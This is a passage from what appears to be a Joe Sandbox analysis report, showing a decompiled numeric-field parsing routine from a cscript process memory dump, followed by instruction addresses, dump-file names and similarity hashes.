							E02618980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0260DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0263EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0263EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                        0x0263fcd1
                                        0x0263fcd6
                                        0x0263fcd9
                                        0x0263fcdc
                                        0x0263fcdf
                                        0x0263fce2
                                        0x0263fce5
                                        0x0263fce8
                                        0x0263fceb
                                        0x0263fced
                                        0x0263fced
                                        0x0263fcf3
                                        0x00000000
                                        0x00000000
                                        0x0263fcfc
                                        0x0263fcfe
                                        0x0263fdc1
                                        0x0266ecbd
                                        0x00000000
                                        0x0266eccc
                                        0x0266eccc
                                        0x0266ecd2
                                        0x00000000
                                        0x00000000
                                        0x0266ecdf
                                        0x0266ece0
                                        0x0266ece4
                                        0x0266eceb
                                        0x0266ecee
                                        0x0266eca8
                                        0x0266eca8
                                        0x0266ecaa
                                        0x0263fd76
                                        0x0263fd79
                                        0x0263fdb4
                                        0x0263fdb5
                                        0x0263fdb6
                                        0x00000000
                                        0x0263fdb6
                                        0x0263fd7e
                                        0x0266ecfc
                                        0x0263fe2f
                                        0x00000000
                                        0x0263fe2f
                                        0x0266ed08
                                        0x0266ed0f
                                        0x0266ed17
                                        0x0266ed1b
                                        0x00000000
                                        0x0266ed1b
                                        0x0263fd88
                                        0x00000000
                                        0x00000000
                                        0x0263fd94
                                        0x0263fd99
                                        0x0263fda1
                                        0x00000000
                                        0x00000000
                                        0x0263fdb0
                                        0x00000000
                                        0x0263fdb0
                                        0x0266ecbd
                                        0x0263fdc7
                                        0x0263fdcb
                                        0x00000000
                                        0x0263fdd7
                                        0x0263fde3
                                        0x0263fe06
                                        0x02651fe7
                                        0x00000000
                                        0x00000000
                                        0x02651fef
                                        0x02651ff0
                                        0x02651ff4
                                        0x02651ff7
                                        0x02651ffa
                                        0x02651ffd
                                        0x02652000
                                        0x00000000
                                        0x00000000
                                        0x0266ecf1
                                        0x00000000
                                        0x0266ecf1
                                        0x00000000
                                        0x0263fe06
                                        0x0263fde8
                                        0x0263fdec
                                        0x0263fdef
                                        0x0263fdf2
                                        0x00000000
                                        0x0263fdf2
                                        0x0263fdcb
                                        0x0263fd04
                                        0x0263fd05
                                        0x0266ec67
                                        0x00000000
                                        0x00000000
                                        0x0266ec6f
                                        0x00000000
                                        0x0266ec6f
                                        0x0263fd13
                                        0x0263fd3c
                                        0x0263fd40
                                        0x0266ec75
                                        0x0266ec7a
                                        0x00000000
                                        0x0266ec8a
                                        0x0266ec8a
                                        0x0266ec90
                                        0x0266ecb2
                                        0x0263fd73
                                        0x0263fd73
                                        0x00000000
                                        0x0263fd73
                                        0x0266ec95
                                        0x00000000
                                        0x00000000
                                        0x0266eca1
                                        0x0266eca4
                                        0x0266eca5
                                        0x00000000
                                        0x0266eca5
                                        0x0266ec7a
                                        0x0263fd4a
                                        0x00000000
                                        0x0263fd6e
                                        0x0263fd6e
                                        0x0263fd71
                                        0x00000000
                                        0x0263fd71
                                        0x0263fd4a
                                        0x0263fd21
                                        0x0264a3a1
                                        0x00000000
                                        0x0264a3a1
                                        0x0263fd36
                                        0x0265200b
                                        0x02652012
                                        0x00000000
                                        0x00000000
                                        0x02652018
                                        0x00000000
                                        0x02652018
                                        0x00000000
                                        0x0263fd36
                                        0x0263fe0f
                                        0x0263fe16
                                        0x0264a3ad
                                        0x00000000
                                        0x00000000
                                        0x0264a3b3
                                        0x0264a3b3
                                        0x0263fe1f
                                        0x0266ed25
                                        0x0266ed86
                                        0x00000000
                                        0x00000000
                                        0x0266ed91
                                        0x0266ed95
                                        0x0266ed95
                                        0x0266ed9a
                                        0x0266edad
                                        0x0266edb3
                                        0x0266edba
                                        0x0266edc4
                                        0x0266edc9
                                        0x00000000
                                        0x0266edcc
                                        0x0266ed2a
                                        0x0266ed55
                                        0x00000000
                                        0x00000000
                                        0x0266ed61
                                        0x0266ed66
                                        0x0266ed6e
                                        0x00000000
                                        0x00000000
                                        0x0266ed7d
                                        0x00000000
                                        0x0266ed7d
                                        0x0266ed30
                                        0x00000000
                                        0x00000000
                                        0x0266ed3c
                                        0x0266ed43
                                        0x0266ed4b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: __fassign
                                        • String ID:
                                        • API String ID: 3965848254-0
                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                        • Instruction ID: 25385884d3540b9b0cc72e6e2e19dc08e5238f601768c55db299cc8733d19a7c
                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                        • Instruction Fuzzy Hash: 2D91CE31D0021AFEDF2ADF99C848BBEB7F5EF45308F20806AD415A7691EB714A41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%